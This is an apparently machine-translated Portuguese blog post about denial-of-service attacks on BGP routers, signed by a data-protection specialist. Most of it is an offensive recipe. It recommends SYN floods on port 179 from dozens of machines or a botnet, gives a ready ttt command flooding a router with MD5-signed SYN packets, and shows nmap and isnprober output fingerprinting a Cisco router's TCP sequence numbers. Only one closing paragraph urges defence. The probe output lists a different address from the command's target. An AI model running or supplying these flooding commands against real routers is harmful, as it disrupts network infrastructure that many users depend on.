Ataques DoS "cegos" em roteadores BGP. 1
Chamaremos de ataques cegos aqueles que não exigem nenhum conhecimento adicional além do endereço IP do roteador BGP. A encenação a mais simples para tal ataque DoS é uma inundação SYN na porta TCP 179. Para implementar tal ataque em um roteador industrial, você precisa usar várias dezenas de computadores, ou melhor ainda, uma botnet.
Uma maneira mais interessante de "inundar" um roteador de destino BGP usando a autenticação MD5 é usar pacotes TCP SYN com assinaturas MD5. Este ataque permite que você adicione a carga computacional ao processamento MD5 pelo roteador atacado.
Tal ataque é fácil de realizar usando o utilitário ttt com a opção md5. Para otimizar a inundação, várias instâncias ttt devem estar em execução em várias dezenas de máquinas.
Aqui está um exemplo de Uso do utilitário ttt:
arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5
allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y
179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191
Falando em equipamentos da Cisco Systems, deve-se mencionar a possibilidade de implementação de ataques ao overflow da pilha TCP/IP do IOS. Scanners de vulnerabilidades como Nmap, hping2 e isnprober podem ser usados para identificar tais vulnerabilidades.
Aqui está um exemplo para um roteador Cisco 2600:
kali# nmap -sS -O -vvvv 192.168.66.215
<skip>
TCP Sequence Prediction: class="truly" random
Difficulty=9999999 (Good luck!)
TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C
<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215
-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --
Using eth0:192.168.77.5
Probing host: 192.168.66.215 on TCP port 23.
Host:port ISN Delta
192.168.66.202:23 -1154503313
192.168.66.202:23 -24125463 1130377850
192.168.66.202:23 2031059534 2055184997
192.168.66.202:23 965205234 -1065854300
192.168.66.202:23 -1974685094 -2939890328
192.168.66.202:23 1760147902 3734832996
192.168.66.202:23 2089287258 329139356
192.168.66.202:23 -923724721 -3013011979
192.168.66.202:23 -934490140 -10765419
192.168.66.202:23 -1262713275 -328223135
Em geral, o protocolo de roteamento BGP versão 4 é parte integrante da Internet moderna e, consequentemente, problemas na operação desse protocolo certamente afetarão o funcionamento da rede global. Portanto, se as atribuições do administrador do sistema incluem a manutenção de roteadores que trabalham com BGP (via de regra, são empresas provedoras), é necessário levar a sério as possíveis ameaças e tomar medidas de proteção contra elas com antecedência.
Petukhov Oleg, advogado de Direito Internacional e proteção de dados pessoais, especialista em informação segurança, proteção de informações e dados pessoais.
Canal do Telegram: https://t.me/protecaodaInformacao
Grupo em Telegram: https://t.me/protecaodaInformacao1
Site: https://legascom.ru
Correio eletrónico: online@legascom.ru
#segurançadaInformação #Segurançadainformação




